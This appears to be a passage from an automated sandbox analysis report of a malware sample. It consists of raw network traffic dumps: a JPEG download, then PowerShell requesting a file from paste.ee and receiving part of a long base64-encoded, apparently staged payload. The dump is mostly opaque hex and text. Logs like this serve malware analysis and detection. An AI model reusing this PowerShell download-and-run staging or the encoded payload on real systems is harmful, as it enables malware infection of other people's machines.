                                                                                                          Access-Control-Expose-Headers: Content-Length,ETag,Server-Timing,X-Content-Type-Options
                                                                                                          x-request-id: fdecdd9b808625f2ef998baba5084d1b
                                                                                                          2024-12-17 06:22:11 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
                                                                                                          Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
                                                                                                          2024-12-17 06:22:11 UTC1378INData Raw: 77 24 91 80 f7 ed aa 38 13 c5 74 2e 92 f9 a4 19 c0 50 c1 95 13 cc f4 aa d7 4f e2 f4 f6 cf 9a 34 12 6a 34 d1 ac 34 c0 35 95 3d b3 e9 ff 00 b5 df 0d 9e 5f 16 d1 c2 37 3c 8c ae 62 55 46 b2 4b 70 2d 85 9e 48 cf 03 04 29 1a 02 c8 cb 27 e1 22 e8 8f 87 f3 c0 63 45 08 87 48 b1 94 0b b9 a8 91 99 9a b8 22 87 5d 10 0c cd 1b b7 a8 92 00 02 e8 d6 6a e9 8a 5b 07 65 52 c0 a8 46 37 fa 62 5a 9d 3c 47 59 18 29 b4 1d c3 d2 47 3f 4c 09 9f 4f a7 74 d3 90 78 2c c0 37 bf 3c 73 8a 10 92 a8 46 da b2 2c 8a a8 77 71 9b 83 4e 8f 0a 82 ab ed c1 ac ce 7f 04 8d 35 22 50 e5 08 6b aa b1 81 68 b5 2c ec eb e5 80 55 14 32 31 a5 53 75 63 e7 97 d6 cd 1e a2 6d 36 91 ee de 4f 55 76 14 79 07 0b 2b 22 ef 72 88 c0 2f a9 8a 8e 6b 31 f4 8c da ed 7c d2 10 5c 85 3b 2c d5 0a 23 a6 06 b8 8b 6f 90 b0 bc
                                                                                                          Data Ascii: w$8t.PO4j445=_7<bUFKp-H)'"cEH"]j[eRF7bZ<GY)G?LOtx,7<sF,wqN5"Pkh,U21Sucm6OUvy+"r/k1|\;,#o
                                                                                                          2024-12-17 06:22:11 UTC1378INData Raw: 8c cd 80 06 22 88 00 fb 74 c5 c6 89 f4 fe 2d 26 ab ef 2f e5 b0 1e 8a 15 d3 03 7b ef a3 82 6d 4f 7c 20 f1 02 0b 6d 76 25 85 73 99 62 5f 34 d8 1c 7b e1 83 10 a3 8a b3 d7 01 8d 66 a0 49 0c 6a 5b 68 dc c7 75 e1 74 7a 92 cc 1f 71 de be 96 e6 f7 0f 7c c8 f1 3d 3b 6a 61 8e 38 e5 68 88 53 ea 51 cd e4 69 8b 69 b6 02 ec e5 68 59 ea 78 eb 81 ea 25 9c b2 90 2b 69 19 91 39 68 a6 8e 4d 96 a1 83 30 63 c6 30 9a 85 d8 ac 59 55 5b 81 67 92 71 2f 14 95 e6 85 a2 86 89 65 2a 6b b5 e0 6a 45 e2 ed 26 a4 45 1f aa 31 d4 a9 e0 1f 6c cd 97 c4 4b c9 2b 9e 77 31 20 fd 71 4d 32 2f 84 e8 00 6d cc e7 80 7b 9f 8e 27 14 ca fc 0f c3 cf 24 60 3a 67 91 e4 34 0b 1a be b9 07 54 77 8b e0 11 ef df 04 93 a2 2b 51 f5 1e 2b e1 99 7a 9d 2e ac 78 92 ce 35 2d f7 72 2b cb a1 5f 3c 0d 4d 46 b0 24 43 7b
                                                                                                          Data Ascii: "t-&/{mO| mv%sb_4{fIj[hutzq|=;ja8hSQiihYx%+i9hM0c0YU[gq/e*kjE&E1lK+w1 qM2/m{'$`:g4Tw+Q+z.x5-r+_<MF$C{
                                                                                                          2024-12-17 06:22:11 UTC1378INData Raw: 66 6d 4b f8 66 a7 61 05 96 26 b5 23 f1 70 73 f3 be ae 35 fb ac f2 15 01 99 ef 9e a3 9e d9 f5 ef 18 fb 5d a0 0b 26 92 09 a3 77 64 65 26 fe 07 fe bf ae 7c 9f 57 2c 6f e1 f2 21 70 ae ac 0d 7b e0 62 6c 20 6e 07 80 31 dd 33 bb 44 39 b3 7c 83 8a 79 8d b8 86 e0 1e 31 9d 15 14 65 07 a6 03 88 18 2d 95 5e 72 e2 32 ca 6d 45 1c ac a8 16 35 3b e8 8c a9 d4 24 41 44 8e 59 8f 4e 0e 01 3c b5 58 f6 8b 5a 3c 57 4c 80 be e2 fe 63 38 92 e0 90 f4 3a d6 5c be c4 0e ce 02 81 f9 e0 42 26 e0 56 94 1f 6c 23 82 aa 2d 54 0d c4 8f 8e 29 06 b5 25 76 51 e8 3d af be 32 1d 5c 6d 2c 09 1d f0 0f 13 72 3a 7d 71 b5 72 07 52 7e 03 33 d0 d6 da 3c f7 c6 44 6b d2 46 56 37 55 7d 0e 01 0c 8f 24 8a 63 ba f6 03 bf b6 3a 74 d3 3c 51 3c 60 33 49 b7 d3 e9 0c 2f a1 da 1b 77 36 39 34 39 1e f9 5d 14 f0 e9
                                                                                                          Data Ascii: fmKfa&#ps5]&wde&|W,o!p{bl n13D9|y1e-^r2mE5;$ADYN<XZ<WLc8:\B&Vl#-T)%vQ=2\m,r:}qrR~3<DkFV7U}$c:t<Q<`3I/w6949]
                                                                                                          2024-12-17 06:22:11 UTC1378INData Raw: 02 f2 41 e0 62 ed a9 02 44 70 8a c0 0b 66 63 c8 f9 65 03 79 a4 21 b2 3a 71 db 03 2e c8 9c 24 7b 9a fa fc 06 07 ba 3a c5 79 3c b6 3b 59 7b 91 f8 be 58 b6 b4 02 37 6d e7 bf c7 25 cd 2d 06 2c 3f 17 06 b1 43 36 d6 28 cc d4 dc 82 47 4f ae 00 1d 03 03 e9 c0 ec 01 b6 ed e9 8e 05 3b 6a ab db e3 95 f2 8b 03 5c 0e f8 0b 30 55 21 42 96 63 d1 47 7c 22 e8 dc 95 79 9d ae ec 20 6e 07 cf 0e a8 ab ca a5 03 d0 e5 e2 47 67 a2 2e b0 07 20 26 43 e9 ed c7 1f d7 2a 51 c2 9b 5e b8 47 23 71 04 51 ca 16 24 71 80 22 18 70 16 b2 e8 8c 48 39 60 bc d0 be 7a d6 6a 78 57 86 2e b9 a5 56 b5 0a bf 89 7a 86 c0 48 0f 49 17 47 2b b5 98 10 1b 93 c0 cf 56 3c 0f 47 c3 04 90 81 41 bd 46 c9 ae bc 63 71 e8 74 b1 a8 03 4d 18 ae fb 45 fe 67 03 c2 18 66 d3 b5 14 60 4f 3e ae f9 74 0c ec 41 5c f7 6f a7
                                                                                                          Data Ascii: AbDpfcey!:q.${:y<;Y{X7m%-,?C6(GO;j\0U!BcG|"y nGg. &C*Q^G#qQ$q"pH9`zjxW.VzHIG+V<GAFcqtMEgf`O>tA\o
                                                                                                          2024-12-17 06:22:11 UTC1378INData Raw: f1 15 94 48 14 8d b6 ca df a7 03 e9 f1 cc df b0 9a 89 a3 d3 7d a7 48 0c aa 4f 84 33 7a 05 9a 12 c4 39 ae db 49 07 e1 78 6f b5 a3 56 df b4 cd 42 6a db 6c ad a8 85 db 71 e8 19 51 81 f8 0a 38 1e fb ed 9c ba 65 d2 cd f6 82 49 4c da 88 d8 68 f4 fb a3 2c b1 f9 91 ee 2f 67 f1 10 a1 80 1d 8b 03 db 3e 6f a5 7d 2b 49 12 ef 8d 83 7e 0e 3a 8a 24 9e 9c 1f 7f 9e 7b 5f da 44 2f a0 f0 ff 00 0d 48 24 46 1a ad 05 36 c4 5a 71 4a 40 aa e7 9a e7 3e 65 f7 7d 42 08 d6 35 7a f2 dd 94 dd 6d 62 bd 30 35 27 d2 46 65 8a 40 54 aa 93 60 8b fd 30 5e 46 98 ea 15 46 9d 41 55 2d c8 a1 f9 74 c4 92 09 9f 4c c3 d4 a4 44 a1 94 25 7a 87 23 a9 e4 f1 97 58 35 0d 34 6e c8 f4 ec 25 2c 79 da 45 d0 fc ab 03 61 20 d3 6d dd b1 16 bd 94 56 56 5d 3e 92 65 37 1a 5d 75 0b 99 9a 6d 43 a4 c1 0e 9a c9 dc 4b
                                                                                                          Data Ascii: H}HO3z9IxoVBjlqQ8eILh,/g>o}+I~:${_D/H$F6ZqJ@>e}B5zmb05'Fe@T`0^FFAU-tLD%z#X54n%,yEa mVV]>e7]umCK
                                                                                                          2024-12-17 06:22:11 UTC1378INData Raw: 0f 38 48 fe dc e9 54 9b 82 4d fd 58 12 28 e7 cf e7 79 21 87 cc 2e ca e0 72 a8 2f 13 89 e4 d5 5b c6 ee 48 fc 4a c2 b0 3d e6 a7 ed f6 98 ea 3f 79 a6 90 83 de c0 c9 3f 6c 74 82 88 d3 b8 53 ec dc e7 cf a5 47 2d be 6b bb a0 06 3f 04 cd 0a 82 f0 2c 8a dc 0d d8 1e b9 be da e9 18 d7 95 29 3d bd 57 94 7f b7 3a 54 50 7e eb 2b 3d 55 93 9e 6a 2d 56 9b 54 ac 53 49 12 95 34 48 26 ef 17 95 d7 cc 56 11 2f c4 73 c6 07 a8 9b ed f6 8a 14 2c 74 ce 1a ba 6e ac cb f0 9f b5 be 11 e1 d3 4b 20 4d 43 bc c7 73 6e 6b 0a 7d 80 ac cd 30 69 b5 3e 96 d2 a3 12 3f 10 ea 33 16 5f 04 d4 0d 63 46 8b 69 d4 37 41 81 bf e3 9f 6c e5 d4 f8 a4 53 78 74 af 0c 51 0d db 4d 90 cd ec 46 7a 78 be de e8 bc a5 59 f4 ec d2 6c 05 88 60 05 9f 60 73 c1 41 e0 b1 23 7e f8 b3 f1 cf 6a 39 a9 f7 7d 24 6a 0b a0 07
                                                                                                          Data Ascii: 8HTMX(y!.r/[HJ=?y?ltSG-k?,)=W:TP~+=Uj-VTSI4H&V/s,tnK MCsnk}0i>?3_cFi7AlSxtQMFzxYl``sA#~j9}$j
                                                                                                          2024-12-17 06:22:11 UTC1378INData Raw: 93 c3 b9 dc ee 49 76 31 34 6a b8 dc 05 11 d7 8b bc 70 f8 b6 92 49 de 46 2e 1e 55 62 e4 a2 90 58 83 c9 1d f8 24 59 b3 de f3 0e 69 7c cd a2 ec 2a 95 51 55 42 c9 fa f5 38 17 95 15 a4 31 a2 aa b2 83 6b 1d 91 c5 d9 b2 7d b2 da 77 31 22 d4 65 b7 b1 50 7d c8 af ee 30 63 51 21 05 4b 02 0d d9 2a 09 e7 ad 1a b1 91 1c 92 aa 00 ad 41 4e e0 3d 8f 1f db 01 89 35 3b c0 20 15 db de f0 6f a9 56 75 76 dc 48 ed bb 8c 08 5b 4a 17 7d f9 ca 88 49 e2 f9 18 1a 03 c4 23 6b 26 3e a2 b2 24 d6 c3 22 14 64 b1 ef ed 88 84 29 76 39 ca bd 12 08 bf cb 00 a4 c2 14 98 d5 83 0e 84 9c 9d 36 a5 e0 63 42 c9 e7 9c 18 e0 82 47 07 2c 14 16 14 d5 f0 ac 0d 24 f1 5d a4 03 18 2f ee 33 6b 47 ad d3 3e 98 4d 26 91 19 99 d9 77 32 b9 ae 9e a2 43 00 33 ca 86 52 de ae 08 03 9c 29 21 94 85 5e 2a b8 e3 eb d7
                                                                                                          Data Ascii: Iv14jpIF.UbX$Yi|*QUB81k}w1"eP}0cQ!K*AN=5; oVuvH[J}I#k&>$"d)v96cBG,$]/3kG>M&w2C3R)!^*
                                                                                                          2024-12-17 06:22:11 UTC1378INData Raw: 55 78 17 d8 df cf 2b 2c 4e 80 47 2a b5 05 dd 83 d3 29 55 65 55 65 1b 88 c0 d0 66 49 22 dc ae c1 81 be 17 8e 98 b8 77 8c 15 90 2d 6e ea 32 88 5e 32 40 1b ab 2a 25 32 69 64 0c c3 75 1f cc 74 c0 b4 00 44 43 48 3d 24 9e be d9 57 87 73 82 09 b3 d6 b1 53 aa 77 34 e4 5d 03 47 e5 93 f7 c4 14 49 da 40 2a 7e 3f 96 07 ad 79 e3 61 bd 4e d0 7b e4 95 8a 45 b0 c5 8f c3 02 ba 33 cb 53 00 3b 9c 80 42 b1 3b b9 f9 60 18 ce aa 42 b2 86 1d 2c 76 f9 e3 0e ab 40 03 c5 70 31 00 f6 a4 48 6a fa 1d b8 cc 2f e7 00 a5 a9 94 58 f8 8c 0e 24 5d 61 13 77 6b 03 e1 92 17 af 1f 8b 8b c9 29 b5 49 1f 2c 00 18 b9 2d 6c 4f c7 28 47 15 75 86 08 42 f2 6b 2a c9 e9 3e bc 08 42 03 02 af 44 f7 ba cd 6f 04 d6 47 a2 d4 4a f3 be d5 70 2b 82 6d be 99 8e 14 03 f8 ac e1 01 2b d3 ad 7b d6 07 a4 f1 bd 8b 0a
                                                                                                          Data Ascii: Ux+,NG*)UeUefI"w-n2^2@*%2idutDCH=$WsSw4]GI@*~?yaN{E3S;B;`B,v@p1Hj/X$]awk)I,-lO(GuBk*>BDoGJp+m+{
                                                                                                          2024-12-17 06:22:11 UTC1378INData Raw: 20 86 62 6f b7 53 95 e9 c1 c0 bc 8f be be 19 5d c4 8a ed 90 7e 1d 32 39 c0 90 48 37 9c 4d 9c e1 d7 9e 99 6a 5f 2e ef d5 7d 3e 18 10 8a 5d c2 8e a7 8c 69 34 c5 24 56 24 30 0d 46 b1 55 b1 ea 1d 46 31 16 a9 92 68 d9 85 aa 90 6b 01 c1 a3 1f 78 16 c0 03 ea 1c d1 c0 ea a1 47 d4 b2 c6 e2 c0 b3 63 fa e0 66 d4 34 f3 16 51 42 c9 03 28 ac 03 31 65 dc 4f 7f 6c 06 e7 83 7e 99 69 cb 32 f7 6e ff 00 2c 5a 39 4a c0 e9 cd 9e 38 cd 24 4f 37 40 10 47 6c 3a 1f ae 27 36 92 58 80 97 69 00 1b 35 81 30 05 58 83 ca 01 00 f7 cf b2 7e cf b4 a9 3f ec fb 47 a6 9e 36 97 4f a8 fb 42 11 94 77 56 88 29 e7 b7 cf b6 7c 6a 58 19 c8 f2 eb 6d 73 66 8f 39 fa 1b f6 20 88 bf 60 e7 77 65 21 f5 ce 36 b3 71 7b 50 00 47 c4 d0 fa e0 7c f3 ec 86 96 0d 24 df 69 61 de cc 9f 72 5f 4c 4e 18 b2 99 62 23 d4
                                                                                                          Data Ascii: boS]~29H7Mj_.}>]i4$V$0FUF1hkxGcf4QB(1eOl~i2n,Z9J8$O7@Gl:'6Xi50X~?G6OBwV)|jXmsf9 `we!6q{PG|$iar_LNb#


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          1192.168.2.649770104.21.84.674435924C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-17 06:22:33 UTC67OUTGET /r/3tNKn/0 HTTP/1.1
                                                                                                          Host: paste.ee
                                                                                                          Connection: Keep-Alive
                                                                                                          2024-12-17 06:22:34 UTC1271INHTTP/1.1 200 OK
                                                                                                          Date: Tue, 17 Dec 2024 06:22:34 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Cache-Control: max-age=2592000
                                                                                                          strict-transport-security: max-age=63072000
                                                                                                          x-frame-options: DENY
                                                                                                          x-content-type-options: nosniff
                                                                                                          x-xss-protection: 1; mode=block
                                                                                                          content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
                                                                                                          CF-Cache-Status: MISS
                                                                                                          Last-Modified: Tue, 17 Dec 2024 06:22:34 GMT
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XrIfldVJE5NMLXRM5MsBimYj17qYNFzGYm9aNMUL1luTv0i8yHaU72aQbG0%2BwCINM88s7LHT5voZ44Oa1fSc6d5Wf4vGNippFHtZF7B3OeOGCWy8xFTuHHpGyw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8f34d1c4fb720f43-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          2024-12-17 06:22:34 UTC214INData Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 31 34 37 31 26 6d 69 6e 5f 72 74 74 3d 31 34 36 36 26 72 74 74 5f 76 61 72 3d 35 36 30 26 73 65 6e 74 3d 35 26 72 65 63 76 3d 37 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 31 36 26 72 65 63 76 5f 62 79 74 65 73 3d 36 38 31 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 31 39 33 37 36 32 34 26 63 77 6e 64 3d 33 32 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 35 61 34 61 63 34 65 39 63 39 39 37 36 63 35 33 26 74 73 3d 39 33 33 26 78 3d 30 22 0d 0a 0d 0a
                                                                                                          Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=1471&min_rtt=1466&rtt_var=560&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2816&recv_bytes=681&delivery_rate=1937624&cwnd=32&unsent_bytes=0&cid=5a4ac4e9c9976c53&ts=933&x=0"
                                                                                                          2024-12-17 06:22:34 UTC1253INData Raw: 33 35 66 37 0d 0a 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 77 44 2b 38 67 4e 50 38 79 44 6e 38 77 48 50 59 78 44 54 38 77 43 50 41 73 44 35 37 51 38 4f 6b 75 44 67 37 41 32 4f 38 73 44 48 36 41 76 4f 4d 72 44 72 36 77 6f 4f 73 70 44 52 36 67 69 4f 51 6f 44 43 36 51 67 4f 41 6b 44 2f 35
                                                                                                          Data Ascii: 35f7AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwD+8gNP8yDn8wHPYxDT8wCPAsD57Q8OkuDg7A2O8sDH6AvOMrDr6woOspDR6giOQoDC6QgOAkD/5
                                                                                                          2024-12-17 06:22:34 UTC1369INData Raw: 39 33 41 2f 4e 73 66 44 36 33 67 39 4e 55 66 44 78 33 77 36 4e 6b 65 44 6f 33 77 35 4e 59 65 44 69 33 51 34 4e 30 64 44 58 33 51 31 4e 51 64 44 54 33 77 7a 4e 34 63 44 4b 33 41 78 4e 49 63 44 42 33 41 67 4e 38 62 44 37 32 67 75 4e 59 62 44 77 32 67 72 4e 30 61 44 73 32 41 71 4e 63 61 44 6a 32 51 6e 4e 73 5a 44 61 32 67 6c 4e 55 5a 44 52 32 77 69 4e 6b 59 44 49 32 41 68 4e 4d 55 44 39 31 41 66 4e 73 58 44 36 31 41 5a 4e 49 57 44 68 41 41 51 41 6b 42 67 42 41 44 41 41 41 73 44 61 37 51 47 4d 77 41 41 41 41 41 42 41 47 41 4c 41 37 41 7a 4f 6f 6f 44 31 36 41 74 4f 41 72 44 6d 36 67 6e 4f 55 70 44 50 36 67 6a 4f 6f 6f 44 45 35 41 65 4f 49 6e 44 72 35 67 61 4f 49 6d 44 68 35 41 59 4f 38 42 41 41 41 41 44 41 47 41 49 41 34 41 49 4f 38 68 44 41 33 77 2f 4e 34 66
                                                                                                          Data Ascii: 93A/NsfD63g9NUfDx3w6NkeDo3w5NYeDi3Q4N0dDX3Q1NQdDT3wzN4cDK3AxNIcDB3AgN8bD72guNYbDw2grN0aDs2AqNcaDj2QnNsZDa2glNUZDR2wiNkYDI2AhNMUD91AfNsXD61AZNIWDhAAQAkBgBADAAAsDa7QGMwAAAAABAGALA7AzOooD16AtOArDm6gnOUpDP6gjOooDE5AeOInDr5gaOImDh5AYO8BAAAADAGAIA4AIO8hDA3w/N4f
                                                                                                          2024-12-17 06:22:34 UTC1369INData Raw: 36 51 71 4f 63 71 44 6c 36 77 6f 4f 45 71 44 66 36 51 6e 4f 73 70 44 5a 36 77 6c 4f 55 70 44 54 36 51 6b 4f 38 6f 44 4e 36 77 69 4f 6b 6f 44 48 36 51 68 4f 4d 6f 44 42 35 77 66 4f 30 6e 44 37 35 51 65 4f 63 6e 44 31 35 77 63 4f 45 6e 44 76 35 51 62 4f 73 6d 44 70 35 77 5a 4f 55 6d 44 6a 35 51 59 4f 38 6c 44 64 35 77 57 4f 6b 6c 44 58 35 51 56 4f 4d 6c 44 52 35 77 54 4f 30 6b 44 4c 35 51 53 4f 63 6b 44 46 35 77 51 4f 45 67 44 2f 34 51 50 4f 73 6a 44 35 34 77 4e 4f 55 6a 44 7a 34 51 4d 4f 38 69 44 74 34 77 4b 4f 6b 69 44 6e 34 51 4a 4f 4d 69 44 68 34 77 48 4f 30 68 44 62 34 51 47 4f 63 68 44 56 34 77 45 4f 45 68 44 50 34 51 44 4f 73 67 44 4a 34 77 42 4f 55 67 44 44 34 51 77 4e 38 66 44 39 33 77 2b 4e 6b 66 44 33 33 51 39 4e 4d 66 44 62 33 51 32 4e 63 64 44
                                                                                                          Data Ascii: 6QqOcqDl6woOEqDf6QnOspDZ6wlOUpDT6QkO8oDN6wiOkoDH6QhOMoDB5wfO0nD75QeOcnD15wcOEnDv5QbOsmDp5wZOUmDj5QYO8lDd5wWOklDX5QVOMlDR5wTO0kDL5QSOckDF5wQOEgD/4QPOsjD54wNOUjDz4QMO8iDt4wKOkiDn4QJOMiDh4wHO0hDb4QGOchDV4wEOEhDP4QDOsgDJ4wBOUgDD4QwN8fD93w+NkfD33Q9NMfDb3Q2NcdD
                                                                                                          2024-12-17 06:22:34 UTC1369INData Raw: 67 63 4e 41 58 44 75 31 41 62 4e 6f 57 44 6f 31 67 5a 4e 51 57 44 69 31 41 59 4e 34 56 44 63 31 67 57 4e 67 56 44 57 31 41 56 4e 49 56 44 51 31 67 54 4e 77 55 44 4b 31 41 53 4e 59 55 44 45 31 67 51 4e 41 51 44 2b 30 41 50 4e 6f 54 44 34 30 67 4e 4e 51 54 44 79 30 41 4d 4e 34 53 44 73 30 67 4b 4e 67 53 44 6d 30 41 4a 4e 49 53 44 67 30 67 48 4e 77 52 44 61 30 41 47 4e 59 52 44 55 30 67 45 4e 41 52 44 4f 30 41 44 4e 6f 51 44 49 30 67 42 4e 51 51 44 43 30 41 77 4d 34 50 44 38 7a 67 2b 4d 67 50 44 32 7a 41 39 4d 49 50 44 77 7a 67 37 4d 77 4f 44 71 7a 41 36 4d 59 4f 44 6b 7a 67 34 4d 41 4f 44 65 7a 41 33 4d 6f 4e 44 59 7a 67 31 4d 51 4e 44 53 7a 41 30 4d 34 4d 44 4d 7a 67 79 4d 67 4d 44 47 7a 41 78 4d 49 4d 44 41 79 67 76 4d 77 4c 44 36 79 41 75 4d 59 4c 44 30
                                                                                                          Data Ascii: gcNAXDu1AbNoWDo1gZNQWDi1AYN4VDc1gWNgVDW1AVNIVDQ1gTNwUDK1ASNYUDE1gQNAQD+0APNoTD40gNNQTDy0AMN4SDs0gKNgSDm0AJNISDg0gHNwRDa0AGNYRDU0gENARDO0ADNoQDI0gBNQQDC0AwM4PD8zg+MgPD2zA9MIPDwzg7MwODqzA6MYODkzg4MAODezA3MoNDYzg1MQNDSzA0M4MDMzgyMgMDGzAxMIMDAygvMwLD6yAuMYLD0
                                                                                                          2024-12-17 06:22:34 UTC1369INData Raw: 6b 4f 45 70 44 50 36 51 6a 4f 73 6f 44 4a 36 77 68 4f 55 6f 44 44 36 51 51 4f 38 6e 44 39 35 77 65 4f 6b 6e 44 33 35 51 64 4f 4d 6e 44 78 35 77 62 4f 30 6d 44 72 35 51 61 4f 63 6d 44 6c 35 77 59 4f 45 6d 44 66 35 51 58 4f 73 6c 44 5a 35 77 56 4f 55 6c 44 54 35 51 55 4f 38 6b 44 4e 35 77 53 4f 6b 6b 44 48 35 51 52 4f 4d 6b 44 42 34 77 50 4f 30 6a 44 37 34 51 4f 4f 63 6a 44 31 34 77 4d 4f 45 6a 44 76 34 51 4c 4f 45 68 44 51 34 77 44 4f 34 67 44 4e 34 41 44 4f 73 67 44 4b 34 51 43 4f 67 67 44 48 34 67 42 4f 55 67 44 45 34 41 77 4e 38 66 44 2b 33 51 2f 4e 77 66 44 37 33 67 2b 4e 6b 66 44 34 33 77 39 4e 59 66 44 31 33 41 38 4e 38 65 44 75 33 51 37 4e 77 65 44 72 33 67 36 4e 6b 65 44 6f 33 77 35 4e 59 65 44 6c 33 41 35 4e 4d 65 44 69 33 51 34 4e 41 65 44 66 33
                                                                                                          Data Ascii: kOEpDP6QjOsoDJ6whOUoDD6QQO8nD95weOknD35QdOMnDx5wbO0mDr5QaOcmDl5wYOEmDf5QXOslDZ5wVOUlDT5QUO8kDN5wSOkkDH5QROMkDB4wPO0jD74QOOcjD14wMOEjDv4QLOEhDQ4wDO4gDN4ADOsgDK4QCOggDH4gBOUgDE4AwN8fD+3Q/NwfD73g+NkfD43w9NYfD13A8N8eDu3Q7NweDr3g6NkeDo3w5NYeDl3A5NMeDi3Q4NAeDf3
                                                                                                          2024-12-17 06:22:34 UTC1369INData Raw: 50 41 37 6a 64 2b 73 69 50 69 30 6a 74 39 30 61 50 77 30 7a 4a 38 51 4b 50 61 74 7a 59 36 4d 76 4f 2b 6d 6a 7a 35 73 62 4f 7a 67 54 2f 34 6b 53 4e 2f 51 54 35 30 51 33 4d 4e 4f 44 62 79 51 76 4d 54 4c 54 76 79 51 6f 4d 65 45 7a 37 78 55 63 4d 63 42 44 68 77 63 44 41 41 41 41 55 41 55 41 41 41 38 54 76 2f 73 36 50 69 34 44 33 39 4d 74 4f 57 6f 6a 44 36 59 51 4f 2b 6e 7a 39 34 49 7a 4e 32 66 44 35 33 49 39 4e 41 66 6a 72 32 6b 50 4e 51 4d 54 30 7a 38 37 4d 74 4f 7a 6d 7a 6b 34 4d 33 4e 54 5a 7a 4d 31 4d 42 4e 7a 4c 7a 30 78 4d 4c 49 54 2b 79 55 72 4d 68 4b 54 55 79 6f 6b 4d 50 45 54 2b 78 63 63 4d 37 47 44 6a 78 38 58 4d 42 46 44 49 78 59 52 4d 44 41 54 32 77 41 4e 4d 4a 44 7a 68 77 41 49 4d 47 42 44 4d 77 6b 42 4d 53 41 41 41 41 51 48 41 45 41 50 41 41 41
                                                                                                          Data Ascii: PA7jd+siPi0jt90aPw0zJ8QKPatzY6MvO+mjz5sbOzgT/4kSN/QT50Q3MNODbyQvMTLTvyQoMeEz7xUcMcBDhwcDAAAAUAUAAA8Tv/s6Pi4D39MtOWojD6YQO+nz94IzN2fD53I9NAfjr2kPNQMT0z87MtOzmzk4M3NTZzM1MBNzLz0xMLIT+yUrMhKTUyokMPET+xccM7GDjx8XMBFDIxYRMDAT2wANMJDzhwAIMGBDMwkBMSAAAAQHAEAPAAA
                                                                                                          2024-12-17 06:22:34 UTC1369INData Raw: 65 4b 44 66 79 77 6d 4d 58 4a 54 54 78 77 61 4d 58 47 6a 6a 78 45 59 4d 32 46 44 49 78 67 42 4d 7a 44 7a 36 77 30 4c 4d 32 43 54 70 77 73 4a 4d 52 43 6a 69 77 73 48 4d 31 42 6a 62 77 4d 47 41 41 41 41 64 41 51 41 67 41 41 41 41 2b 63 75 50 63 37 44 66 2b 51 69 50 65 34 44 47 2b 55 51 50 33 33 7a 37 39 67 64 50 4f 33 7a 77 39 30 62 50 34 32 7a 6b 39 6f 59 50 6d 31 6a 58 39 38 52 50 58 77 6a 31 38 73 4d 50 34 78 6a 63 38 73 41 50 44 73 54 39 37 30 2b 4f 6b 76 7a 32 37 4d 39 4f 4c 76 7a 77 37 67 37 4f 6d 75 6a 6e 37 49 35 4f 4b 75 54 67 37 67 33 4f 77 74 44 61 37 41 32 4f 59 74 7a 53 37 38 7a 4f 33 6f 54 2b 36 30 73 4f 68 71 6a 65 36 51 6e 4f 